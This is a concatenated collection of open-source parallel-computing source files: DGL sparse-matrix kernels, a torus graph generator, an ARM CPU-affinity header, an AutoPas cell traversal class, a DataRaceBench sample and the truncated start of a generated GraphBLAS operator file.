const bool has_idx = !IsNullArray(coo.data);
const IdType* row = coo.row.Ptr<IdType>();
const IdType* col = coo.col.Ptr<IdType>();
const IdType* edges = coo.data.Ptr<IdType>();
const DType* X = ufeat.Ptr<DType>();
const DType* W = efeat.Ptr<DType>();
int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = out.Ptr<DType>();
const int64_t nnz = coo.row->shape[0];
// fill zero elements
memset(O, 0, out.GetSize());
// spmm
#pragma omp parallel for
for (IdType i = 0; i < nnz; ++i) {
const IdType rid = row[i];
const IdType cid = col[i];
const IdType eid = has_idx? edges[i] : i;
DType* out_off = O + cid * dim;
for (int64_t k = 0; k < dim; ++k) {
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + rid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
const DType val = Op::Call(lhs_off, rhs_off);
#pragma omp atomic
out_off[k] += val;
}
}
}
/*!
* \brief CPU kernel of SpMM-Min/Max on Csr format.
* \param bcast Broadcast information.
* \param csr The Csr matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \param argu Arg-Min/Max on source nodes, which refers the source node indices
* correspond to the minimum/maximum values of reduction result on
* destination nodes. It's useful in computing gradients of Min/Max reducer.
* \param arge Arg-Min/Max on edges. which refers the source node indices
* correspond to the minimum/maximum values of reduction result on
* destination nodes. It's useful in computing gradients of Min/Max reducer.
* \note it uses node parallel strategy, different threads are responsible
* for the computation of different nodes.
*/
template <typename IdType, typename DType, typename Op, typename Cmp>
void SpMMCmpCsr(
const BcastOff& bcast,
const CSRMatrix& csr,
NDArray ufeat, NDArray efeat,
NDArray out, NDArray argu, NDArray arge) {
const bool has_idx = !IsNullArray(csr.data);
const IdType* indptr = static_cast<IdType*>(csr.indptr->data);
const IdType* indices = static_cast<IdType*>(csr.indices->data);
const IdType* edges = has_idx ? static_cast<IdType*>(csr.data->data) : nullptr;
const DType* X = Op::use_lhs? static_cast<DType*>(ufeat->data) : nullptr;
const DType* W = Op::use_rhs? static_cast<DType*>(efeat->data) : nullptr;
const int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = static_cast<DType*>(out->data);
IdType* argX = Op::use_lhs? static_cast<IdType*>(argu->data) : nullptr;
IdType* argW = Op::use_rhs? static_cast<IdType*>(arge->data) : nullptr;
#pragma omp parallel for
for (IdType rid = 0; rid < csr.num_rows; ++rid) {
const IdType row_start = indptr[rid], row_end = indptr[rid + 1];
DType* out_off = O + rid * dim;
IdType* argx_off = argX + rid * dim;
IdType* argw_off = argW + rid * dim;
for (int64_t k = 0; k < dim; ++k) {
DType accum = Cmp::zero;
IdType ax = 0, aw = 0;
for (IdType j = row_start; j < row_end; ++j) {
const IdType cid = indices[j];
const IdType eid = has_idx? edges[j] : j;
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + cid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
const DType val = Op::Call(lhs_off, rhs_off);
if (Cmp::Call(accum, val)) {
accum = val;
if (Op::use_lhs)
ax = cid;
if (Op::use_rhs)
aw = eid;
}
}
out_off[k] = accum;
if (Op::use_lhs)
argx_off[k] = ax;
if (Op::use_rhs)
argw_off[k] = aw;
}
}
}
/*!
* \brief CPU kernel of SpMM-Min/Max on Coo format.
* \param bcast Broadcast information.
* \param coo The Coo matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \param argu Arg-Min/Max on source nodes, which refers the source node indices
* correspond to the minimum/maximum values of reduction result on
* destination nodes. It's useful in computing gradients of Min/Max reducer.
* \param arge Arg-Min/Max on edges. which refers the source node indices
* correspond to the minimum/maximum values of reduction result on
* destination nodes. It's useful in computing gradients of Min/Max reducer.
* \note it uses node parallel strategy, different threads are responsible
* for the computation of different nodes. To avoid possible data hazard,
* we use atomic operators in the reduction phase.
*/
template <typename IdType, typename DType, typename Op, typename Cmp>
void SpMMCmpCoo(
const BcastOff& bcast,
const COOMatrix& coo,
NDArray ufeat, NDArray efeat,
NDArray out, NDArray argu, NDArray arge) {
const bool has_idx = !IsNullArray(coo.data);
const IdType* row = static_cast<IdType*>(coo.row->data);
const IdType* col = static_cast<IdType*>(coo.col->data);
const IdType* edges = has_idx? static_cast<IdType*>(coo.data->data) : nullptr;
const DType* X = Op::use_lhs? static_cast<DType*>(ufeat->data) : nullptr;
const DType* W = Op::use_rhs? static_cast<DType*>(efeat->data) : nullptr;
const int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = static_cast<DType*>(out->data);
IdType* argX = Op::use_lhs? static_cast<IdType*>(argu->data) : nullptr;
IdType* argW = Op::use_rhs? static_cast<IdType*>(arge->data) : nullptr;
const int64_t nnz = coo.row->shape[0];
// fill zero elements
std::fill(O, O + out.NumElements(), Cmp::zero);
// spmm
#pragma omp parallel for
for (IdType i = 0; i < nnz; ++i) {
const IdType rid = row[i];
const IdType cid = col[i];
const IdType eid = has_idx? edges[i] : i;
DType* out_off = O + cid * dim;
IdType* argx_off = Op::use_lhs? argX + cid * dim : nullptr;
IdType* argw_off = Op::use_rhs? argW + cid * dim : nullptr;
for (int64_t k = 0; k < dim; ++k) {
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + rid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
const DType val = Op::Call(lhs_off, rhs_off);
#pragma omp critical
if (Cmp::Call(out_off[k], val)) {
out_off[k] = val;
if (Op::use_lhs)
argx_off[k] = rid;
if (Op::use_rhs)
argw_off[k] = eid;
}
}
}
}
namespace op {
//////////////////////////////// binary operators on CPU ////////////////////////////////
template <typename DType>
struct Add {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off + *rhs_off;
}
};
template <typename DType> constexpr bool Add<DType>::use_lhs;
template <typename DType> constexpr bool Add<DType>::use_rhs;
template <typename DType>
struct Sub {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off - *rhs_off;
}
};
template <typename DType> constexpr bool Sub<DType>::use_lhs;
template <typename DType> constexpr bool Sub<DType>::use_rhs;
template <typename DType>
struct Mul {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off * *rhs_off;
}
};
template <typename DType> constexpr bool Mul<DType>::use_lhs;
template <typename DType> constexpr bool Mul<DType>::use_rhs;
template <typename DType>
struct Div {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off / *rhs_off;
}
};
template <typename DType> constexpr bool Div<DType>::use_lhs;
template <typename DType> constexpr bool Div<DType>::use_rhs;
template <typename DType>
struct CopyLhs {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = false;
inline static DType Call(const DType* lhs_off, const DType* ) {
return *lhs_off;
}
};
template <typename DType> constexpr bool CopyLhs<DType>::use_lhs;
template <typename DType> constexpr bool CopyLhs<DType>::use_rhs;
template <typename DType>
struct CopyRhs {
static constexpr bool use_lhs = false;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* , const DType* rhs_off) {
return *rhs_off;
}
};
template <typename DType> constexpr bool CopyRhs<DType>::use_lhs;
template <typename DType> constexpr bool CopyRhs<DType>::use_rhs;
//////////////////////////////// Reduce operators on CPU ////////////////////////////////
template <typename DType>
struct Max {
static constexpr DType zero = std::numeric_limits<DType>::lowest();
// return true if accum should be replaced
inline static DType Call(DType accum, DType val) {
return accum < val;
}
};
template <typename DType> constexpr DType Max<DType>::zero;
template <typename DType>
struct Min {
static constexpr DType zero = std::numeric_limits<DType>::max();
// return true if accum should be replaced
inline static DType Call(DType accum, DType val) {
return accum > val;
}
};
template <typename DType> constexpr DType Min<DType>::zero;
#define SWITCH_OP(op, Op, ...) \
do { \
if ((op) == "add") { \
typedef dgl::aten::cpu::op::Add<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "sub") { \
typedef dgl::aten::cpu::op::Sub<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "mul") { \
typedef dgl::aten::cpu::op::Mul<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "div") { \
typedef dgl::aten::cpu::op::Div<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "copy_u") { \
typedef dgl::aten::cpu::op::CopyLhs<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "copy_e") { \
typedef dgl::aten::cpu::op::CopyRhs<DType> Op; \
{ __VA_ARGS__ } \
} else { \
LOG(FATAL) << "Unsupported SpMM binary operator: " << op; \
} \
} while (0)
} // namespace op
} // namespace cpu
} // namespace aten
} // namespace dgl
#endif // DGL_ARRAY_CPU_SPMM_H_
|
gen2DTorus.c | #include "defs.h"
#define PARALLEL_SDG
/* Set this variable to zero to run the data generator
on one thread (for debugging purposes) */
double gen2DTorus(graphSDG* SDGdata) {
VERT_T *src, *dest;
WEIGHT_T *wt;
#ifdef _OPENMP
omp_lock_t* vLock;
#endif
double elapsed_time;
int seed;
elapsed_time = get_seconds();
/* allocate memory for edge tuples */
src = (VERT_T *) malloc(M*sizeof(VERT_T));
dest = (VERT_T *) malloc(M*sizeof(VERT_T));
wt = (WEIGHT_T *) malloc(M*sizeof(WEIGHT_T));
assert(src != NULL);
assert(dest != NULL);
assert(wt != NULL);
/* sprng seed */
seed = 2387;
#ifdef _OPENMP
#ifdef PARALLEL_SDG
omp_set_num_threads(omp_get_max_threads());
// omp_set_num_threads(16);
#else
omp_set_num_threads(1);
#endif
#endif
#ifdef _OPENMP
#pragma omp parallel
{
#endif
int tid, nthreads;
#ifdef DIAGNOSTIC
double elapsed_time_part;
#endif
int *stream;
LONG_T n, m;
LONG_T i, j, x, y;
LONG_T x_start, x_end, offset;
LONG_T count;
#ifdef _OPENMP
nthreads = omp_get_num_threads();
tid = omp_get_thread_num();
#else
nthreads = 1;
tid = 0;
#endif
/* Initialize RNG stream */
stream = init_sprng(0, tid, nthreads, seed, SPRNG_DEFAULT);
#ifdef DIAGNOSTIC
if (tid == 0)
elapsed_time_part = get_seconds();
#endif
n = N;
m = M;
if (SCALE % 2 == 0) {
x = 1<<(SCALE/2);
y = 1<<(SCALE/2);
} else {
x = 1<<((SCALE+1)/2);
y = 1<<((SCALE-1)/2);
}
count = 0;
x_start = (x/nthreads)*tid;
x_end = (x/nthreads)*(tid+1);
if (tid == 0)
x_start = 0;
if (tid == nthreads-1)
x_end = x;
offset = 4*x_start*y;
fprintf(stderr, "tid: %d, x_start: %d, x_end: %d, offset: %d\n",
tid, x_start, x_end, offset);
// if (tid == 0) {
for (i = x_start; i < x_end; i++) {
for (j = 0; j < y; j++) {
/* go down */
if (j > 0) {
src[offset+count] = y*i + j;
dest[offset+count] = y*i + j - 1;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = y*i + y - 1;
}
count++;
/* go up */
if (j < y-1) {
src[offset+count] = y*i + j;
dest[offset+count] = y*i + j + 1;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = y*i;
}
count++;
/* go left */
if (i > 0) {
src[offset+count] = y*i + j;
dest[offset+count] = y*(i-1) + j;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = y*(x-1) + j;
}
count++;
/* go right */
if (i < x-1) {
src[offset+count] = y*i + j;
dest[offset+count] = y*(i+1) + j;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = j;
}
count++;
}
}
// }
#ifdef _OPENMP
#pragma omp barrier
#endif
#ifdef DIAGNOSTIC
if (tid == 0) {
elapsed_time_part = get_seconds() -elapsed_time_part;
fprintf(stderr, "Tuple generation time: %lf seconds\n", elapsed_time_part);
elapsed_time_part = get_seconds();
}
#endif
#ifdef _OPENMP
#pragma omp barrier
#pragma omp for
#endif
for (i=0; i<m; i++) {
wt[i] = 1 + MaxIntWeight * sprng(stream);
}
#ifdef DIAGNOSTIC
if (tid == 0) {
elapsed_time_part = get_seconds() - elapsed_time_part;
fprintf(stderr, "Generating edge weights: %lf seconds\n", elapsed_time_part);
elapsed_time_part = get_seconds();
}
#endif
SDGdata->n = n;
SDGdata->m = m;
SDGdata->startVertex = src;
SDGdata->endVertex = dest;
SDGdata->weight = wt;
#ifdef _OPENMP
}
#endif
elapsed_time = get_seconds() - elapsed_time;
return elapsed_time;
}
|
arm_device.h | #ifndef ANAKIN2_SABER_ARM_DEVICES_H
#define ANAKIN2_SABER_ARM_DEVICES_H
#include <stdio.h>
#include <vector>
#include "device.h"
#ifdef PLATFORM_ANDROID
#include <sys/syscall.h>
#include <unistd.h>
#define __NCPUBITS__ (8 * sizeof (unsigned long))
#define __CPU_SET(cpu, cpusetp) \
((cpusetp)->mask_bits[(cpu) / __NCPUBITS__] |= (1UL << ((cpu) % __NCPUBITS__)))
#define __CPU_ZERO(cpusetp) \
memset((cpusetp), 0, sizeof(cpu_set_t))
#endif
#if __APPLE__
#include "TargetConditionals.h"
#if TARGET_OS_IPHONE
#include <sys/types.h>
#include <sys/sysctl.h>
#include <mach/machine.h>
#define __IOS__
#endif
#endif
#ifdef USE_ARM_PLACE
static int arm_get_cpucount()
{
#ifdef PLATFORM_ANDROID
// get cpu count from /proc/cpuinfo
FILE* fp = fopen("/proc/cpuinfo", "rb");
if (!fp) {
return 1;
}
int count = 0;
char line[1024];
while (!feof(fp))
{
char* s = fgets(line, 1024, fp);
if (!s) {
break;
}
if (memcmp(line, "processor", 9) == 0) {
count++;
}
}
fclose(fp);
if (count < 1) {
count = 1;
}
return count;
#elif __IOS__
int count = 0;
size_t len = sizeof(count);
sysctlbyname("hw.ncpu", &count, &len, NULL, 0);
if (count < 1) {
count = 1;
}
return count;
#else
return 1;
#endif
}
static int arm_get_meminfo()
{
#ifdef PLATFORM_ANDROID
// get cpu count from /proc/cpuinfo
FILE* fp = fopen("/proc/meminfo", "rb");
if (!fp) {
return 1;
}
int memsize = 0;
char line[1024];
while (!feof(fp))
{
char* s = fgets(line, 1024, fp);
if (!s) {
break;
}
sscanf(s, "MemTotal: %d kB", &memsize);
}
fclose(fp);
return memsize;
#elif __IOS__
// to be implemented
return 0;
#endif
}
#ifdef PLATFORM_ANDROID
static int get_max_freq_khz(int cpuid)
{
// first try, for all possible cpu
char path[256];
snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpufreq/stats/cpu%d/time_in_state",\
cpuid);
FILE* fp = fopen(path, "rb");
if (!fp)
{
// second try, for online cpu
snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/cpufreq/stats/time_in_state",\
cpuid);
fp = fopen(path, "rb");
if (!fp)
{
// third try, for online cpu
snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/cpufreq/cpuinfo_max_freq",\
cpuid);
fp = fopen(path, "rb");
if (!fp) {
return -1;
}
int max_freq_khz = -1;
fscanf(fp, "%d", &max_freq_khz);
fclose(fp);
return max_freq_khz;
}
}
int max_freq_khz = 0;
while (!feof(fp))
{
int freq_khz = 0;
int nscan = fscanf(fp, "%d %*d", &freq_khz);
if (nscan != 1) {
break;
}
if (freq_khz > max_freq_khz) {
max_freq_khz = freq_khz;
}
}
fclose(fp);
return max_freq_khz;
}
static int arm_sort_cpuid_by_max_frequency(int cpu_count, std::vector<int>& cpuids, \
std::vector<int>& cpu_freq, std::vector<int>& cluster_ids) {
//const int cpu_count = cpuids.size();
if (cpu_count == 0) {
return 0;
}
//std::vector<int> cpu_max_freq_khz;
cpuids.resize(cpu_count);
cpu_freq.resize(cpu_count);
cluster_ids.resize(cpu_count);
for (int i = 0; i < cpu_count; i++)
{
int max_freq_khz = get_max_freq_khz(i);
//printf("%d max freq = %d khz\n", i, max_freq_khz);
cpuids[i] = i;
cpu_freq[i] = max_freq_khz / 1000;
}
// sort cpuid as big core first
// simple bubble sort
/*
for (int i = 0; i < cpu_count; i++)
{
for (int j = i+1; j < cpu_count; j++)
{
if (cpu_freq[i] < cpu_freq[j])
{
// swap
int tmp = cpuids[i];
cpuids[i] = cpuids[j];
cpuids[j] = tmp;
tmp = cpu_freq[i];
cpu_freq[i] = cpu_freq[j];
cpu_freq[j] = tmp;
}
}
}*/
// SMP
int mid_max_freq_khz = (cpu_freq.front() + cpu_freq.back()) / 2;
//if (mid_max_freq_khz == cpu_freq.back())
// return 0;
for (int i = 0; i < cpu_count; i++)
{
if (cpu_freq[i] >= mid_max_freq_khz) {
cluster_ids[i] = 0;
}
else{
cluster_ids[i] = 1;
}
}
return 0;
}
#endif // __ANDROID__
#ifdef __IOS__
static int sort_cpuid_by_max_frequency(int cpu_count, std::vector<int>& cpuids, \
std::vector<int>& cpu_freq, std::vector<int>& cluster_ids){
if (cpu_count == 0) {
return 0;
}
cpuids.resize(cpu_count);
cpu_freq.resize(cpu_count);
cluster_ids.resize(cpu_count);
for (int i = 0; i < cpu_count; ++i) {
cpuids[i] = i;
cpu_freq[i] = 1000;
cluster_ids[i] = 0;
}
}
#endif
#ifdef PLATFORM_ANDROID
static int set_sched_affinity(const std::vector<int>& cpuids)
{
// cpu_set_t definition
// ref http://stackoverflow.com/questions/16319725/android-set-thread-affinity
typedef struct
{
unsigned long mask_bits[1024 / __NCPUBITS__];
}cpu_set_t;
// set affinity for thread
pid_t pid = gettid();
cpu_set_t mask;
__CPU_ZERO(&mask);
for (int i = 0; i < (int)cpuids.size(); i++)
{
__CPU_SET(cpuids[i], &mask);
}
int syscallret = syscall(__NR_sched_setaffinity, pid, sizeof(mask), &mask);
if (syscallret)
{
LOG(ERROR) << "syscall error " << syscallret;
return -1;
}
return 0;
}
static int set_cpu_affinity(const std::vector<int>& cpuids){
#ifdef USE_OPENMP
int num_threads = cpuids.size();
omp_set_num_threads(num_threads);
std::vector<int> ssarets(num_threads, 0);
#pragma omp parallel for
for (int i = 0; i < num_threads; i++)
{
ssarets[i] = set_sched_affinity(cpuids);
}
for (int i = 0; i < num_threads; i++)
{
if (ssarets[i] != 0)
{
LOG(ERROR)<<"set cpu affinity failed, cpuID: " << cpuids[i];
return -1;
}
}
#else
std::vector<int> cpuid1;
cpuid1.push_back(cpuids[0]);
int ssaret = set_sched_affinity(cpuid1);
if (ssaret != 0)
{
LOG(ERROR)<<"set cpu affinity failed, cpuID: " << cpuids[0];
return -1;
}
#endif
return 0;
}
#endif //PLATFORN_ANDROID
#endif //USE_ARM_PLACE
#endif //ANAKIN2_SABER_ARM_DEVICES_H
|
CBasedTraversal.h | /**
* @file CBasedTraversal.h
* @author C. Menges
* @date 26.04.2019
*/
#pragma once
#include "autopas/containers/cellPairTraversals/CellPairTraversal.h"
#include "autopas/utils/ArrayMath.h"
#include "autopas/utils/DataLayoutConverter.h"
#include "autopas/utils/ThreeDimensionalMapping.h"
namespace autopas {
/**
* This class provides the base for traversals using base steps based on cell coloring.
*
* @tparam ParticleCell the type of cells
* @tparam PairwiseFunctor The functor that defines the interaction of two particles.
* @tparam dataLayout
* @tparam useNewton3
* @tparam collapseDepth Set the depth of loop collapsion for OpenMP. Loop variables from outer to inner loop: z,y,x
*/
template <class ParticleCell, class PairwiseFunctor, DataLayoutOption::Value dataLayout, bool useNewton3,
int collapseDepth = 3>
class CBasedTraversal : public CellPairTraversal<ParticleCell> {
protected:
/**
* Constructor of the CBasedTraversal.
* @param dims The dimensions of the cellblock, i.e. the number of cells in x,
* y and z direction.
* @param pairwiseFunctor The functor that defines the interaction of two particles.
* @param interactionLength Interaction length (cutoff + skin).
* @param cellLength cell length.
*/
explicit CBasedTraversal(const std::array<unsigned long, 3> &dims, PairwiseFunctor *pairwiseFunctor,
const double interactionLength, const std::array<double, 3> &cellLength)
: CellPairTraversal<ParticleCell>(dims),
_interactionLength(interactionLength),
_cellLength(cellLength),
_dataLayoutConverter(pairwiseFunctor) {
for (unsigned int d = 0; d < 3; d++) {
_overlap[d] = std::ceil(_interactionLength / _cellLength[d]);
}
}
/**
* Destructor of CBasedTraversal.
*/
~CBasedTraversal() override = default;
public:
/**
* load Data Layouts required for this Traversal if cells have been set through setCellsToTraverse().
*/
void initTraversal() override {
if (this->_cells) {
auto &cells = *(this->_cells);
#ifdef AUTOPAS_OPENMP
/// @todo find a condition on when to use omp or when it is just overhead
#pragma omp parallel for
#endif
for (size_t i = 0; i < cells.size(); ++i) {
_dataLayoutConverter.loadDataLayout(cells[i]);
}
}
}
/**
* write Data to AoS if cells have been set through setCellsToTraverse().
*/
void endTraversal() override {
if (this->_cells) {
auto &cells = *(this->_cells);
#ifdef AUTOPAS_OPENMP
/// @todo find a condition on when to use omp or when it is just overhead
#pragma omp parallel for
#endif
for (size_t i = 0; i < cells.size(); ++i) {
_dataLayoutConverter.storeDataLayout(cells[i]);
}
}
}
protected:
/**
* The main traversal of the CTraversal.
* @tparam LoopBody type of the loop body
* @param loopBody The body of the loop as a function. Normally a lambda function, that takes as as parameters
* (x,y,z). If you need additional input from outside, please use captures (by reference).
* @param end 3D index until interactions are processed (exclusive).
* @param stride Distance (in cells) to the next cell of the same color.
* @param offset initial offset (in cells) in which cell to start the traversal.
*/
template <typename LoopBody>
inline void cTraversal(LoopBody &&loopBody, const std::array<unsigned long, 3> &end,
const std::array<unsigned long, 3> &stride,
const std::array<unsigned long, 3> &offset = {0ul, 0ul, 0ul});
/**
* This method is called when the color during the traversal has changed.
*
* @param newColor The new current color.
*/
virtual void notifyColorChange(unsigned long newColor){};
/**
* Interaction length (cutoff + skin).
*/
const double _interactionLength;
/**
* cell length in CellBlock3D.
*/
const std::array<double, 3> _cellLength;
/**
* overlap of interacting cells. Array allows asymmetric cell sizes.
*/
std::array<unsigned long, 3> _overlap;
private:
/**
* Data Layout Converter to be used with this traversal
*/
utils::DataLayoutConverter<PairwiseFunctor, dataLayout> _dataLayoutConverter;
};
template <class ParticleCell, class PairwiseFunctor, DataLayoutOption::Value dataLayout, bool useNewton3,
int collapseDepth>
template <typename LoopBody>
inline void CBasedTraversal<ParticleCell, PairwiseFunctor, dataLayout, useNewton3, collapseDepth>::cTraversal(
LoopBody &&loopBody, const std::array<unsigned long, 3> &end, const std::array<unsigned long, 3> &stride,
const std::array<unsigned long, 3> &offset) {
#if defined(AUTOPAS_OPENMP)
#pragma omp parallel
#endif
{
const unsigned long numColors = stride[0] * stride[1] * stride[2];
for (unsigned long col = 0; col < numColors; ++col) {
#if defined(AUTOPAS_OPENMP)
#pragma omp single
#endif
{
// barrier at omp for of previous loop iteration, so fine to change it for everyone!
notifyColorChange(col);
// implicit barrier at end of function.
}
std::array<unsigned long, 3> startWithoutOffset(utils::ThreeDimensionalMapping::oneToThreeD(col, stride));
std::array<unsigned long, 3> start(utils::ArrayMath::add(startWithoutOffset, offset));
// intel compiler demands following:
const unsigned long start_x = start[0], start_y = start[1], start_z = start[2];
const unsigned long end_x = end[0], end_y = end[1], end_z = end[2];
const unsigned long stride_x = stride[0], stride_y = stride[1], stride_z = stride[2];
if (collapseDepth == 2) {
#if defined(AUTOPAS_OPENMP)
#pragma omp for schedule(dynamic, 1) collapse(2)
#endif
for (unsigned long z = start_z; z < end_z; z += stride_z) {
for (unsigned long y = start_y; y < end_y; y += stride_y) {
for (unsigned long x = start_x; x < end_x; x += stride_x) {
// Don't exchange order of execution (x must be last!), it would break other code
loopBody(x, y, z);
}
}
}
} else {
#if defined(AUTOPAS_OPENMP)
#pragma omp for schedule(dynamic, 1) collapse(3)
#endif
for (unsigned long z = start_z; z < end_z; z += stride_z) {
for (unsigned long y = start_y; y < end_y; y += stride_y) {
for (unsigned long x = start_x; x < end_x; x += stride_x) {
// Don't exchange order of execution (x must be last!), it would break other code
loopBody(x, y, z);
}
}
}
}
}
}
}
} // namespace autopas
|
2018-simd2-orig-no.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
two dimensional array computation with a vetorization directive
*/
int a[100][100], b[100][100], c[100][100];
int main()
{
int i,j;
#pragma omp simd collapse(2)
for (i=0;i<100;i++)
for (j=0;j<100;j++)
a[i][j]=b[i][j]*c[i][j];
return 0;
}
|
GB_binop__bclr_uint32.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_01__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_02__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_03__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__bclr_uint32)
// A*D function (colscale): GB ((none))
// D*A function (rowscale): GB ((none))
// C+=B function (dense accum): GB (_Cdense_accumB__bclr_uint32)
// C+=b function (dense accum): GB (_Cdense_accumb__bclr_uint32)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__bclr_uint32)
// C=scalar+B GB (_bind1st__bclr_uint32)
// C=scalar+B' GB (_bind1st_tran__bclr_uint32)
// C=A+scalar GB (_bind2nd__bclr_uint32)
// C=A'+scalar GB (_bind2nd_tran__bclr_uint32)
// C type: uint32_t
// A type: uint32_t
// B,b type: uint32_t
// BinaryOp: cij = GB_BITCLR (aij, bij, uint32_t, 32)
#define GB_ATYPE \
uint32_t
#define GB_BTYPE \
uint32_t
#define GB_CTYPE \
uint32_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
uint32_t aij = GBX (Ax, pA, A_iso)
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
uint32_t bij = GBX (Bx, pB, B_iso)
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
uint32_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = GB_BITCLR (x, y, uint32_t, 32) ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
1
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
